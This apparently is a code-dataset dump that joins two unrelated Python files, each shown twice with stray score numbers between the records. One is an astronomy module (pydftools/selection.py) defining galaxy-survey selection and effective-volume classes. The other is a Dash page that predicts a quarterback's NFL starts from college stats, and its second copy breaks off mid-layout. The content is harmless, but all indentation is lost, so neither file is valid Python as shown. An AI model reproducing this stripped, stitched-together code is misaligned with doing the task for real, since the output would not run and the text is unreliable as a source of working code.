self._veff_extrap(x),
self._veff_fnc(x),
)
def _veff_converter(val):
if callable(val):
return val
elif np.isscalar(val):
return lambda x: val * np.ones_like(x)
@attr.s
class SelectionVeff(Selection):
"""
Base class for simple Selection functions, where only the effective volume function is given.
Parameters
----------
Veff : callable, optional
A function of a D-dimensional vector `x`, specifying the effective volume associated with an object of properties `x`.
Default is 10 ** (2x).
"""
veff = attr.ib(lambda x: 10 ** (2 * x), converter=_veff_converter)
@veff.validator
def _veff_validator(self, att, val):
assert callable(val)
def _veff_fnc(self, x):
return self.veff(x)
def _veff_extrap(self, x):
return super(SelectionVeff, self)._veff_extrap(x)
def _callable_validator(inst, att, val):
assert callable(val)
@attr.s
class SelectionVeffPoints(Selection):
"""
Simple Selection function where only effective volume is given, for a set of discrete points
In this case, we set xmin, xmax equal to the min/max of the passed xval.
Parameters
----------
veff : array-like
Array of effective volumes
xval : array-like
Array of x-values to which veff correspond
veff_extrap: callable, optional
A function of one variable, x, which defines the effective volume outside the observed limits.
"""
veff = attr.ib(default=None)
xval = attr.ib(default=None, converter=lambda x: np.atleast_2d(x).T)
veff_extrap = attr.ib(
default=None, validator=attr.validators.optional(_callable_validator)
)
@veff.validator
def _veff_validator(self, att, val):
assert hasattr(val, "__len__")
assert len(val.shape) == 1
if val.min() < 0:
raise ValueError("All values of selection (=Veff) must be positive.")
@xval.validator
def _xval_validator(self, att, val):
assert len(val) == len(self.veff)
@cached_property
def xmin(self):
return np.array([x.min() for x in self.xval.T])
@cached_property
def xmax(self):
return np.array([x.max() for x in self.xval.T])
@cached_property
def _veff_fnc(self):
n_dim = self.xval.shape[1]
if n_dim == 1:
# Sort the inputs so as to get a good spline
sort_ind = np.argsort(self.xval[:, 0])
veff = self.veff[sort_ind]
xval = self.xval[:, 0][sort_ind]
spl = spline(
xval, 1 / veff, k=1, ext=3
) # Setup to imitate dftools R version
return lambda x: np.where(
x < xval.min(), self._veff_extrap(x), (1 / spl(x))
)
elif n_dim == 2:
def vapprox(xval):
spl = RectBivariateSpline(
self.xval[:, 0], self.xval[:, 1], 1 / self.veff, kx=1, ky=1
)
z = 1 / spl.ev(xval[:, 0], xval[:, 1])
# z = 1 / (akima::interp(x[, 1], x[, 2], 1 / Veff.values, xval[1], xval[2], duplicate = 'mean'))$z
if np.isnan(z):
return 0
else:
return z
return np.vectorize(vapprox)
else:
raise ValueError(
"Linear interpolation of Veff not implemented for DF with more than 2 dimensions. Use a different selection type."
)
def _veff_extrap(self, x):
if self.veff_extrap is not None:
return self.veff_extrap(x)
else:
return super(SelectionVeffPoints, self)._veff_extrap(x)
@attr.s
class SelectionRdep(Selection):
"""
Base class for selection functions given as r-dependent functions
Parameters
----------
f : callable, optional
The selection function ``f(x,r)``, giving the ratio between the expected number of detected galaxies and true
galaxies of log-mass ``x`` and comoving distance ``r``. Normally this function is bound between 0 and 1.
It takes the value 1 at distances, where objects of mass ``x`` are easily detected, and 0 at distances where
such objects are impossible to detect. A rapid, continuous drop from 1 to 0 normally occurs at the limiting
distance ``rmax``, at which a galaxy of log-mass ``x`` can be picked up. ``f(x,r)`` can never by smaller than 0,
but values larger than 1 are conceivable, if there is a large number of false positive detections in the survey.
The default is ``f(x,r) = erf((1-1e3*r/sqrt(10**x))*20)*0.5+0.5}``, which mimics a sensitivity-limited survey
with a fuzzy limit.
dvdr : callable, optional
The function ``dVdr(r)``, specifying the derivative of the survey volume ``V(r)`` as a function of comoving
distance ``r``. This survey volume is simply the total observed volume, irrespective of the detection probability,
which is already specified by the function ``f``. Normally, the survey volume is given by ``V(r)=Omega*r**3/3``,
where ``Omega`` is the solid angle of the survey. Hence, the derivative is ``dVdr(r)=Omega*r**2``.
The default is ``Omega=2.13966`` [sterradians], chosen such that the expected number of galaxies is exactly 1000
when combined with the default selection function ``f(x,r)``.
g : callable, optional
Function of distance ``r`` describing the number-density variation of galaxies due to cosmic large-scale
structure (LSS). Explicitly, ``g(r)>0`` is the number-density at ``r``, relative to the number-density without
LSS. Values between 0 and 1 are underdense regions, values larger than 1 are overdense regions. In the absence
of LSS, ``g(r)=1``. Note that g is automatically rescaled, such that its average value in the survey volume is 1.
rmin,rmax : float, optional
Minimum and maximum distance of the survey. Outside these limits the function ``f(x,r)`` will automatically be
assumed to be 0.
"""
f = attr.ib(
default=lambda x, r: sp.erf((1 - 1e3 * r / np.sqrt(10 ** x)) * 20) * 0.5 + 0.5,
validator=_callable_validator,
)
dvdr = attr.ib(default=lambda r: 2.13966 * r ** 2, validator=_callable_validator)
g = attr.ib(default=None, validator=attr.validators.optional(_callable_validator))
rmin = attr.ib(default=0, converter=np.float)
rmax = attr.ib(default=20, converter=np.float)
@rmax.validator
def _rmax_validator(self, att, val):
assert val > self.rmin
def dVdr(self, r):
"""
The function dvdr, re-normalised by :attr:`vol_renorm`
"""
return self.vol_renorm * self.dvdr(r)
@cached_property
def _veff_no_lss_fnc(self):
def fnc(xval):
# Use the un-normalised dvdr because it will be normalised.
return quad(lambda r: self.f(xval, r) * self.dvdr(r), self.rmin, self.rmax)[
0
]
return np.vectorize(fnc)
def _veff_no_lss(self, x):
"""
The effective volume without LSS
"""
return self._veff_no_lss_fnc(x)
@cached_property
def _gnorm(self):
"""
g(r) properly normalised, such that the average value of g in the survey volume is 1
Returns
-------
g : callable
Scaled g(r).
"""
if self.g is None:
return None
else:
gnorm = (
quad(lambda r: self.dVdr(r) * self.g(r), self.rmin, self.rmax)[0]
/ quad(self.dVdr, self.rmin, self.rmax)[0]
)
return lambda r: self.g(r) / gnorm
@cached_property
def _veff_fnc(self):
"""
The effective volume (including LSS, if any provided).
Parameters
----------
x
Returns
-------
"""
if self.g is None and hasattr(self, "_veff_lss"):
return self._veff_lss
elif self.g is not None:
# evaluate effective volume and source count density with LSS
def veff_lss_elemental(x):
fct = (
lambda r: self.f(x, r) * self._gnorm(r) * self.dvdr(r)
) # Use the un-normalised dvdr because it will be normalised.
return quad(fct, self.rmin, self.rmax)[0]
return np.vectorize(veff_lss_elemental)
else:
return self._veff_no_lss
def _veff_extrap(self, x):
return super(SelectionRdep, self)._veff_extrap(x)
def _get_veff_lss(self, r, grid, p, model, weight=lambda x: np.ones_like(x)):
"""
Generate the best-fit Veff in the presence of unknown LSS.
Parameters
----------
p : tuple
Parameters of the current model.
"""
if self.g is not None:
raise RuntimeError("You do not need to correct for LSS bias if g is known.")
use_simpson = len(grid.xmin) == 1
# evaluate integrals
def integrand_lss(x, r):
return self.f(x, r) * model.gdf(x, p)
integral = np.empty(len(r))
if use_simpson:
for i in range(len(r)):
integral[i] = quad(integrand_lss, grid.xmin, grid.xmax, args=(r[i],))[0]
else:
for i in range(len(r)):
integral[i] = np.sum(integrand_lss(grid.x, r[i])) * grid.dvolume
# make Veff.lss function
def veff_lss_function_elemental(xval):
f = self.f(xval, r)
lst = f > 0
return np.sum(f[lst] / integral[lst])
veff_lss_scale = np.vectorize(
veff_lss_function_elemental
) # Vectorize(Veff.lss.function.elemental)
def int_ref(x):
return self._veff_no_lss(x) * model.gdf(x, p) * weight(x)
def int_exp(x):
return veff_lss_scale(x) * model.gdf(x, p) * weight(x)
if use_simpson:
reference = quad(int_ref, grid.xmin, grid.xmax)[0]
expectation = quad(int_exp, grid.xmin, grid.xmax)[0]
else:
reference = np.sum(int_ref(grid.x)) * grid.dvolume
expectation = np.sum(int_exp(grid.x)) * grid.dvolume
self._veff_lss = lambda x: veff_lss_scale(x) * reference / expectation
# We must do this otherwise we just get the cached version of _veff_fnc
del self._veff_fnc
return self._veff_lss
def mock_r(self, x, verbose=True):
"""
Create a random sample of distances given a sample of x.
Returns
-------
r : array-like
Array of the same length as x given distances to each object.
"""
# ======================================
# find maximum of fg(x,r) = f(x,r)*g(r)
# ======================================
def fg(x, r):
if self.g is not None:
return self.f(x, r) * self._gnorm(r)
else:
return self.f(x, r)
xseq = np.linspace(self.xmin, self.xmax, 100)
rseq = np.linspace(self.rmin, self.rmax, 100)
X, R = np.meshgrid(xseq, rseq)
def fct(p):
return -fg(p[0], p[1])
q = fct((X.flatten(), R.flatten())) # apply(xrgrid, 1, fct)
if np.max(q) > 0:
raise ValueError("f*g can never by smaller than 0.")
xbegin = X.flatten()[np.argmin(q)]
rbegin = R.flatten()[np.argmin(q)]
opt = minimize(
fct,
x0=(xbegin, rbegin),
method="L-BFGS-B",
bounds=((self.xmin, self.xmax), (self.rmin, self.rmax)),
)
fgmax = -opt.fun
if fgmax > 5 and verbose:
print(
"The maximum of f(r)*<g(r)> (=%f) is significantly larger than 1. Check if this is intended."
% fgmax
)
# ============================================
# sample distances (r) using cumsum algorithm
# ============================================
n = len(x)
r = np.empty(n)
dr = min(0.005, (self.rmax - self.rmin) / 1000)
rgrid = np.arange(self.rmin, self.rmax, dr)
cdf = np.cumsum(self.dVdr(rgrid)) # cumulative volume out to r
qnf = spline(cdf, rgrid) # quantile function of source count density
lst = np.arange(n)
m = n
count = 0
while m > 0 and count < 100:
count += 1
r[lst] = qnf(np.random.uniform(cdf[0], cdf[-1], m))
rejected = fg(x[lst], r[lst]) < np.random.uniform(size=m) * fgmax
lst = lst[rejected]
m = len(lst)
# sample distances (r) using deterministic uniroot algorithm to avoid iterating forever
if m > 0:
def get_random_r(x):
H = np.vectorize(
lambda r: quad(lambda r: fg(x, r) * self.dVdr(r), self.rmin, r)[0]
)
def H_inv(y):
return brentq(lambda x: H(x) - y, a=self.rmin, b=self.rmax)
return H_inv(np.random.uniform() * H(self.rmax))
for i in lst:
r[i] = get_random_r(x[i])
return r | pydftools/selection.py | import attr
import scipy.special as sp
import numpy as np
from cached_property import cached_property
from scipy.integrate import quad
from scipy.optimize import minimize, brentq
from scipy.interpolate import (
InterpolatedUnivariateSpline as spline,
RectBivariateSpline,
)
from abc import ABCMeta, abstractmethod
@attr.s
class Selection(object):
"""
Abstract base class representing the selection function of the data used when fitting the generative DF.
Parameters
----------
vol_renorm : float
A single number which re-normalises the total volume of the sample. Useful for creating mock observations
tuned to a given output number of samples.
"""
__metaclass__ = ABCMeta
vol_renorm = attr.ib(default=1.0)
xmax = attr.ib(default=20.0, converter=lambda x: np.atleast_1d(np.array(x)))
xmin = attr.ib(default=0.0, converter=lambda x: np.atleast_1d(np.array(x)))
def __attrs_post_init__(self):
x = np.linspace(self.xmin, self.xmax, 1000)
veff = self.Veff(x)
if np.any(veff == 0) or np.any(np.isinf(veff)):
indx = np.where(np.logical_and(veff > 0, np.logical_not(np.isinf(veff))))[0]
print(
"Warning: xmin returns Veff(xmin)=0, setting xmin, xmax to %s, %s"
% (x[indx].min(), x[indx].max())
)
self.xmin = x[indx].min()
self.xmax = x[indx].max()
@xmin.validator
def _xmin_validator(self, att, val):
if np.any(val > self.xmax):
raise ValueError("xmin cannot be greater than xmax.")
if val.size != self.xmax.size:
raise ValueError("xmax and xmin must be of the same length")
@abstractmethod
def _veff_fnc(self, x):
raise NotImplementedError(
"The Selection abstract base class should not be instantiated directly"
)
@abstractmethod
def _veff_extrap(self, x):
return np.zeros_like(x)
def Veff(self, x):
"""
The effective volume of the observation for a set of properties x.
Parameters
----------
x : array-like
Either a 1D vector of an observed property, or a 2D vector, where the 2nd dimension corresponds to the different properties observed.
Returns
-------
V : array
A 1D vector, of the same length as x, giving the effective volume of the observation at that point in observation space.
"""
x = np.atleast_1d(x)
# Return vol-renormed function of veff_extrap outside observed region, and veff_fnc inside it.
return self.vol_renorm * np.where(
np.logical_or(x < self.xmin, x > self.xmax),
self._veff_extrap(x),
self._veff_fnc(x),
)
def _veff_converter(val):
if callable(val):
return val
elif np.isscalar(val):
return lambda x: val * np.ones_like(x)
@attr.s
class SelectionVeff(Selection):
"""
Base class for simple Selection functions, where only the effective volume function is given.
Parameters
----------
Veff : callable, optional
A function of a D-dimensional vector `x`, specifying the effective volume associated with an object of properties `x`.
Default is 10 ** (2x).
"""
veff = attr.ib(lambda x: 10 ** (2 * x), converter=_veff_converter)
@veff.validator
def _veff_validator(self, att, val):
assert callable(val)
def _veff_fnc(self, x):
return self.veff(x)
def _veff_extrap(self, x):
return super(SelectionVeff, self)._veff_extrap(x)
def _callable_validator(inst, att, val):
assert callable(val)
@attr.s
class SelectionVeffPoints(Selection):
"""
Simple Selection function where only effective volume is given, for a set of discrete points
In this case, we set xmin, xmax equal to the min/max of the passed xval.
Parameters
----------
veff : array-like
Array of effective volumes
xval : array-like
Array of x-values to which veff correspond
veff_extrap: callable, optional
A function of one variable, x, which defines the effective volume outside the observed limits.
"""
veff = attr.ib(default=None)
xval = attr.ib(default=None, converter=lambda x: np.atleast_2d(x).T)
veff_extrap = attr.ib(
default=None, validator=attr.validators.optional(_callable_validator)
)
@veff.validator
def _veff_validator(self, att, val):
assert hasattr(val, "__len__")
assert len(val.shape) == 1
if val.min() < 0:
raise ValueError("All values of selection (=Veff) must be positive.")
@xval.validator
def _xval_validator(self, att, val):
assert len(val) == len(self.veff)
@cached_property
def xmin(self):
return np.array([x.min() for x in self.xval.T])
@cached_property
def xmax(self):
return np.array([x.max() for x in self.xval.T])
@cached_property
def _veff_fnc(self):
n_dim = self.xval.shape[1]
if n_dim == 1:
# Sort the inputs so as to get a good spline
sort_ind = np.argsort(self.xval[:, 0])
veff = self.veff[sort_ind]
xval = self.xval[:, 0][sort_ind]
spl = spline(
xval, 1 / veff, k=1, ext=3
) # Setup to imitate dftools R version
return lambda x: np.where(
x < xval.min(), self._veff_extrap(x), (1 / spl(x))
)
elif n_dim == 2:
def vapprox(xval):
spl = RectBivariateSpline(
self.xval[:, 0], self.xval[:, 1], 1 / self.veff, kx=1, ky=1
)
z = 1 / spl.ev(xval[:, 0], xval[:, 1])
# z = 1 / (akima::interp(x[, 1], x[, 2], 1 / Veff.values, xval[1], xval[2], duplicate = 'mean'))$z
if np.isnan(z):
return 0
else:
return z
return np.vectorize(vapprox)
else:
raise ValueError(
"Linear interpolation of Veff not implemented for DF with more than 2 dimensions. Use a different selection type."
)
def _veff_extrap(self, x):
if self.veff_extrap is not None:
return self.veff_extrap(x)
else:
return super(SelectionVeffPoints, self)._veff_extrap(x)
@attr.s
class SelectionRdep(Selection):
"""
Base class for selection functions given as r-dependent functions
Parameters
----------
f : callable, optional
The selection function ``f(x,r)``, giving the ratio between the expected number of detected galaxies and true
galaxies of log-mass ``x`` and comoving distance ``r``. Normally this function is bound between 0 and 1.
It takes the value 1 at distances, where objects of mass ``x`` are easily detected, and 0 at distances where
such objects are impossible to detect. A rapid, continuous drop from 1 to 0 normally occurs at the limiting
distance ``rmax``, at which a galaxy of log-mass ``x`` can be picked up. ``f(x,r)`` can never by smaller than 0,
but values larger than 1 are conceivable, if there is a large number of false positive detections in the survey.
The default is ``f(x,r) = erf((1-1e3*r/sqrt(10**x))*20)*0.5+0.5}``, which mimics a sensitivity-limited survey
with a fuzzy limit.
dvdr : callable, optional
The function ``dVdr(r)``, specifying the derivative of the survey volume ``V(r)`` as a function of comoving
distance ``r``. This survey volume is simply the total observed volume, irrespective of the detection probability,
which is already specified by the function ``f``. Normally, the survey volume is given by ``V(r)=Omega*r**3/3``,
where ``Omega`` is the solid angle of the survey. Hence, the derivative is ``dVdr(r)=Omega*r**2``.
The default is ``Omega=2.13966`` [sterradians], chosen such that the expected number of galaxies is exactly 1000
when combined with the default selection function ``f(x,r)``.
g : callable, optional
Function of distance ``r`` describing the number-density variation of galaxies due to cosmic large-scale
structure (LSS). Explicitly, ``g(r)>0`` is the number-density at ``r``, relative to the number-density without
LSS. Values between 0 and 1 are underdense regions, values larger than 1 are overdense regions. In the absence
of LSS, ``g(r)=1``. Note that g is automatically rescaled, such that its average value in the survey volume is 1.
rmin,rmax : float, optional
Minimum and maximum distance of the survey. Outside these limits the function ``f(x,r)`` will automatically be
assumed to be 0.
"""
f = attr.ib(
default=lambda x, r: sp.erf((1 - 1e3 * r / np.sqrt(10 ** x)) * 20) * 0.5 + 0.5,
validator=_callable_validator,
)
dvdr = attr.ib(default=lambda r: 2.13966 * r ** 2, validator=_callable_validator)
g = attr.ib(default=None, validator=attr.validators.optional(_callable_validator))
rmin = attr.ib(default=0, converter=np.float)
rmax = attr.ib(default=20, converter=np.float)
@rmax.validator
def _rmax_validator(self, att, val):
assert val > self.rmin
def dVdr(self, r):
"""
The function dvdr, re-normalised by :attr:`vol_renorm`
"""
return self.vol_renorm * self.dvdr(r)
@cached_property
def _veff_no_lss_fnc(self):
def fnc(xval):
# Use the un-normalised dvdr because it will be normalised.
return quad(lambda r: self.f(xval, r) * self.dvdr(r), self.rmin, self.rmax)[
0
]
return np.vectorize(fnc)
def _veff_no_lss(self, x):
"""
The effective volume without LSS
"""
return self._veff_no_lss_fnc(x)
@cached_property
def _gnorm(self):
"""
g(r) properly normalised, such that the average value of g in the survey volume is 1
Returns
-------
g : callable
Scaled g(r).
"""
if self.g is None:
return None
else:
gnorm = (
quad(lambda r: self.dVdr(r) * self.g(r), self.rmin, self.rmax)[0]
/ quad(self.dVdr, self.rmin, self.rmax)[0]
)
return lambda r: self.g(r) / gnorm
@cached_property
def _veff_fnc(self):
"""
The effective volume (including LSS, if any provided).
Parameters
----------
x
Returns
-------
"""
if self.g is None and hasattr(self, "_veff_lss"):
return self._veff_lss
elif self.g is not None:
# evaluate effective volume and source count density with LSS
def veff_lss_elemental(x):
fct = (
lambda r: self.f(x, r) * self._gnorm(r) * self.dvdr(r)
) # Use the un-normalised dvdr because it will be normalised.
return quad(fct, self.rmin, self.rmax)[0]
return np.vectorize(veff_lss_elemental)
else:
return self._veff_no_lss
def _veff_extrap(self, x):
return super(SelectionRdep, self)._veff_extrap(x)
def _get_veff_lss(self, r, grid, p, model, weight=lambda x: np.ones_like(x)):
"""
Generate the best-fit Veff in the presence of unknown LSS.
Parameters
----------
p : tuple
Parameters of the current model.
"""
if self.g is not None:
raise RuntimeError("You do not need to correct for LSS bias if g is known.")
use_simpson = len(grid.xmin) == 1
# evaluate integrals
def integrand_lss(x, r):
return self.f(x, r) * model.gdf(x, p)
integral = np.empty(len(r))
if use_simpson:
for i in range(len(r)):
integral[i] = quad(integrand_lss, grid.xmin, grid.xmax, args=(r[i],))[0]
else:
for i in range(len(r)):
integral[i] = np.sum(integrand_lss(grid.x, r[i])) * grid.dvolume
# make Veff.lss function
def veff_lss_function_elemental(xval):
f = self.f(xval, r)
lst = f > 0
return np.sum(f[lst] / integral[lst])
veff_lss_scale = np.vectorize(
veff_lss_function_elemental
) # Vectorize(Veff.lss.function.elemental)
def int_ref(x):
return self._veff_no_lss(x) * model.gdf(x, p) * weight(x)
def int_exp(x):
return veff_lss_scale(x) * model.gdf(x, p) * weight(x)
if use_simpson:
reference = quad(int_ref, grid.xmin, grid.xmax)[0]
expectation = quad(int_exp, grid.xmin, grid.xmax)[0]
else:
reference = np.sum(int_ref(grid.x)) * grid.dvolume
expectation = np.sum(int_exp(grid.x)) * grid.dvolume
self._veff_lss = lambda x: veff_lss_scale(x) * reference / expectation
# We must do this otherwise we just get the cached version of _veff_fnc
del self._veff_fnc
return self._veff_lss
def mock_r(self, x, verbose=True):
"""
Create a random sample of distances given a sample of x.
Returns
-------
r : array-like
Array of the same length as x given distances to each object.
"""
# ======================================
# find maximum of fg(x,r) = f(x,r)*g(r)
# ======================================
def fg(x, r):
if self.g is not None:
return self.f(x, r) * self._gnorm(r)
else:
return self.f(x, r)
xseq = np.linspace(self.xmin, self.xmax, 100)
rseq = np.linspace(self.rmin, self.rmax, 100)
X, R = np.meshgrid(xseq, rseq)
def fct(p):
return -fg(p[0], p[1])
q = fct((X.flatten(), R.flatten())) # apply(xrgrid, 1, fct)
if np.max(q) > 0:
raise ValueError("f*g can never by smaller than 0.")
xbegin = X.flatten()[np.argmin(q)]
rbegin = R.flatten()[np.argmin(q)]
opt = minimize(
fct,
x0=(xbegin, rbegin),
method="L-BFGS-B",
bounds=((self.xmin, self.xmax), (self.rmin, self.rmax)),
)
fgmax = -opt.fun
if fgmax > 5 and verbose:
print(
"The maximum of f(r)*<g(r)> (=%f) is significantly larger than 1. Check if this is intended."
% fgmax
)
# ============================================
# sample distances (r) using cumsum algorithm
# ============================================
n = len(x)
r = np.empty(n)
dr = min(0.005, (self.rmax - self.rmin) / 1000)
rgrid = np.arange(self.rmin, self.rmax, dr)
cdf = np.cumsum(self.dVdr(rgrid)) # cumulative volume out to r
qnf = spline(cdf, rgrid) # quantile function of source count density
lst = np.arange(n)
m = n
count = 0
while m > 0 and count < 100:
count += 1
r[lst] = qnf(np.random.uniform(cdf[0], cdf[-1], m))
rejected = fg(x[lst], r[lst]) < np.random.uniform(size=m) * fgmax
lst = lst[rejected]
m = len(lst)
# sample distances (r) using deterministic uniroot algorithm to avoid iterating forever
if m > 0:
def get_random_r(x):
H = np.vectorize(
lambda r: quad(lambda r: fg(x, r) * self.dVdr(r), self.rmin, r)[0]
)
def H_inv(y):
return brentq(lambda x: H(x) - y, a=self.rmin, b=self.rmax)
return H_inv(np.random.uniform() * H(self.rmax))
for i in lst:
r[i] = get_random_r(x[i])
return r | 0.90653 | 0.507385 |
import dash
import dash_bootstrap_components as dbc
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output
# Imports from this application
from app import app
from joblib import load
pipeline = load('assets/pipeline.joblib')
import pandas as pd
@app.callback(
Output('prediction-content', 'children'),
[#Input('completions_per_year', 'value'), Input('wins_per_year', 'value'), Input('height', 'value'),
#Input('forty_yard_dash', 'value')],
Input('games_played', 'value'), Input('passing_completions', 'value'), Input('passing_attempts', 'value'),
Input('passing_percentage', 'value'), Input('passing_yards', 'value'), Input('passing_tds', 'value'),
Input('passing_ints', 'value'), Input('passer_rating', 'value'), Input('passes_per_year', 'value'),
Input('completions_per_year', 'value'), Input('yards_per_year', 'value'), Input('tds_per_year', 'value'),
Input('ints_per_year', 'value'), Input('height', 'value'), Input('weight', 'value'),
Input('forty_yard_dash', 'value'), Input('vert_leap', 'value'), Input('broad_jump', 'value'),
Input('shuttle_run', 'value'), Input('three_cone', 'value'), Input('no_combine_attendance', 'value'),
Input('power_five_conf', 'value'), Input('conference_championships', 'value'), Input('wins_per_year', 'value')],
)
def predict(#completions_per_year, wins_per_year, height, forty_yard_dash):
games_played, passing_completions, passing_attempts,
passing_percentage, passing_yards, passing_tds, passing_ints,
passer_rating, passes_per_year, completions_per_year, yards_per_year,
tds_per_year, ints_per_year, height, weight, forty_yard_dash,
vert_leap, broad_jump, shuttle_run, three_cone, no_combine_attendance,
power_five_conf, conference_championships, wins_per_year):
df = pd.DataFrame(
columns=[#'completions_per_year','wins_per_year','height','forty_yard_dash'],
'games_played','passing_completions','passing_attempts',
'passing_percentage','passing_yards','passing_tds','passing_ints',
'passer_rating','passes_per_year','completions_per_year','yards_per_year',
'tds_per_year','ints_per_year','height','weight','forty_yard_dash',
'vert_leap','broad_jump','shuttle_run','three_cone','no_combine_attendance',
'power_five_conf','conference_championships','wins_per_year'],
data=[[#completions_per_year, wins_per_year, height, forty_yard_dash]]
games_played, passing_completions, passing_attempts,
passing_percentage, passing_yards, passing_tds, passing_ints,
passer_rating, passes_per_year, completions_per_year, yards_per_year,
tds_per_year, ints_per_year, height, weight, forty_yard_dash,
vert_leap, broad_jump, shuttle_run, three_cone, no_combine_attendance,
power_five_conf, conference_championships, wins_per_year]]
)
y_pred = pipeline.predict(df)[0]
return html.H1(f'{y_pred:.0f} Starts')
# 2 column layout. 1st column width = 4/12
# https://dash-bootstrap-components.opensource.faculty.ai/l/components/layout
column1 = dbc.Col(
[
dcc.Markdown(
"""
## Predictions
Input the college stats of the quarterback that you would like to predict.
"""
),
dcc.Markdown('#### Completions per Year'),
dcc.Input(
id='completions_per_year',
placeholder='AVG: 178',
type='number',
value=178
),
dcc.Markdown('#### Passing Yards per Season'),
dcc.Input(
id='yards_per_year',
placeholder='AVG: 2194',
type='number',
value=2194
),
dcc.Markdown('#### Passes per Year'),
dcc.Input(
id='passes_per_year',
placeholder='AVG: 211',
type='number',
value=211
),
dcc.Markdown('#### Passing TDs per Season'),
dcc.Input(
id='tds_per_year',
placeholder='AVG: 15',
type='number',
value=15
),
dcc.Markdown('#### Interceptions per Season'),
dcc.Input(
id='ints_per_year',
placeholder='AVG: 8',
type='number',
value=8
),
dcc.Markdown('#### Height (in)'),
dcc.Input(
id='height',
placeholder='AVG: 74',
type='number',
value=74
),
dcc.Markdown('#### Weight (lb)'),
dcc.Input(
id='weight',
placeholder='AVG: 222 lbs',
type='number',
value=222
),
dcc.Markdown('#### 40 Time'),
dcc.Input(
id='forty_yard_dash',
placeholder='AVG: 4.87 Seconds',
type='number',
value=4.87
),
dcc.Markdown('#### Vertical Leap (in)'),
dcc.Input(
id='vert_leap',
placeholder='AVG: 24 inches',
type='number',
value=24
),
dcc.Markdown('#### 3-Cone Drill'),
dcc.Input(
id='three_cone',
placeholder='AVG: 7.34 Seconds',
type='number',
value=7.34
),
dcc.Markdown('#### Broad Jump'),
dcc.Input(
id='broad_jump',
placeholder='AVG: 106 inches',
type='number',
value=106
),
dcc.Markdown('#### Shuttle Run'),
dcc.Input(
id='shuttle_run',
placeholder='AVG: 4.46 Seconds',
type='number',
value=4.46
),
],
md=4,
)
column2 = dbc.Col(
[
dcc.Markdown('#### Games Played'),
dcc.Input(
id='games_played',
placeholder='AVG: 32 Games',
type='number',
value=32
),
dcc.Markdown('#### Total Passing Completions'),
dcc.Input(
id='passing_completions',
placeholder='AVG: 563',
type='number',
value=563
),
dcc.Markdown('#### Total Passing Attempts'),
dcc.Input(
id='passing_attempts',
placeholder='AVG: 939',
type='number',
value=939
),
dcc.Markdown('#### Career Passing Percentage'),
dcc.Input(
id='passing_percentage',
placeholder='AVG: 59.2',
type='number',
value=59.2
),
dcc.Markdown('#### Total Passing Yards'),
dcc.Input(
id='passing_yards',
placeholder='AVG: 6900',
type='number',
value=6900
),
dcc.Markdown('#### Total Passing TDs'),
dcc.Input(
id='passing_tds',
placeholder='AVG: 49',
type='number',
value=49
),
dcc.Markdown('#### Total Interceptions'),
dcc.Input(
id='passing_ints',
placeholder='AVG: 26',
type='number',
value=26
),
dcc.Markdown('#### Career Passer Rating'),
dcc.Input(
id='passer_rating',
placeholder='AVG: 131',
type='number',
value=131
),
dcc.Markdown('#### Wins per Year'),
dcc.Slider(
id='wins_per_year',
min=0,
max=12,
step=13,
value=5,
marks={n: str(n) for n in range(0,13,1)},
className='mb-5',
),
dcc.Markdown('#### Conference Championships Won'),
dcc.Slider(
id='conference_championships',
min=0,
max=4,
step=4,
value=0,
marks={n: str(n) for n in range(0,5,1)},
className='mb-5',
),
dcc.Markdown('#### Attended Combine'),
dcc.Dropdown(
id='no_combine_attendance',
options = [
{'label': 'Yes', 'value': 0},
{'label': 'No', 'value': 1},
],
value = 0,
className='mb-5',
),
dcc.Markdown('#### Power 5 Conference'),
dcc.Dropdown(
id='power_five_conf',
options = [
{'label': 'Yes', 'value': 1},
{'label': 'No', 'value': 0},
],
value = 1,
className='mb-5',
),
],
md=4,
)
column3 = dbc.Col(
[
html.H2('Expected NFL Starts per Season', className='mb-5'),
html.Div(id='prediction-content', className='lead')
]
)
layout = dbc.Row([column1, column2, column3]) | pages/predictions.py | import dash
import dash_bootstrap_components as dbc
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output
# Imports from this application
from app import app
from joblib import load
pipeline = load('assets/pipeline.joblib')
import pandas as pd
@app.callback(
Output('prediction-content', 'children'),
[#Input('completions_per_year', 'value'), Input('wins_per_year', 'value'), Input('height', 'value'),
#Input('forty_yard_dash', 'value')],
Input('games_played', 'value'), Input('passing_completions', 'value'), Input('passing_attempts', 'value'),
Input('passing_percentage', 'value'), Input('passing_yards', 'value'), Input('passing_tds', 'value'),
Input('passing_ints', 'value'), Input('passer_rating', 'value'), Input('passes_per_year', 'value'),
Input('completions_per_year', 'value'), Input('yards_per_year', 'value'), Input('tds_per_year', 'value'),
Input('ints_per_year', 'value'), Input('height', 'value'), Input('weight', 'value'),
Input('forty_yard_dash', 'value'), Input('vert_leap', 'value'), Input('broad_jump', 'value'),
Input('shuttle_run', 'value'), Input('three_cone', 'value'), Input('no_combine_attendance', 'value'),
Input('power_five_conf', 'value'), Input('conference_championships', 'value'), Input('wins_per_year', 'value')],
)
def predict(#completions_per_year, wins_per_year, height, forty_yard_dash):
games_played, passing_completions, passing_attempts,
passing_percentage, passing_yards, passing_tds, passing_ints,
passer_rating, passes_per_year, completions_per_year, yards_per_year,
tds_per_year, ints_per_year, height, weight, forty_yard_dash,
vert_leap, broad_jump, shuttle_run, three_cone, no_combine_attendance,
power_five_conf, conference_championships, wins_per_year):
df = pd.DataFrame(
columns=[#'completions_per_year','wins_per_year','height','forty_yard_dash'],
'games_played','passing_completions','passing_attempts',
'passing_percentage','passing_yards','passing_tds','passing_ints',
'passer_rating','passes_per_year','completions_per_year','yards_per_year',
'tds_per_year','ints_per_year','height','weight','forty_yard_dash',
'vert_leap','broad_jump','shuttle_run','three_cone','no_combine_attendance',
'power_five_conf','conference_championships','wins_per_year'],
data=[[#completions_per_year, wins_per_year, height, forty_yard_dash]]
games_played, passing_completions, passing_attempts,
passing_percentage, passing_yards, passing_tds, passing_ints,
passer_rating, passes_per_year, completions_per_year, yards_per_year,
tds_per_year, ints_per_year, height, weight, forty_yard_dash,
vert_leap, broad_jump, shuttle_run, three_cone, no_combine_attendance,
power_five_conf, conference_championships, wins_per_year]]
)
y_pred = pipeline.predict(df)[0]
return html.H1(f'{y_pred:.0f} Starts')
# 2 column layout. 1st column width = 4/12
# https://dash-bootstrap-components.opensource.faculty.ai/l/components/layout
column1 = dbc.Col(
[
dcc.Markdown(
"""
## Predictions
Input the college stats of the quarterback that you would like to predict.
"""
),
dcc.Markdown('#### Completions per Year'),
dcc.Input(
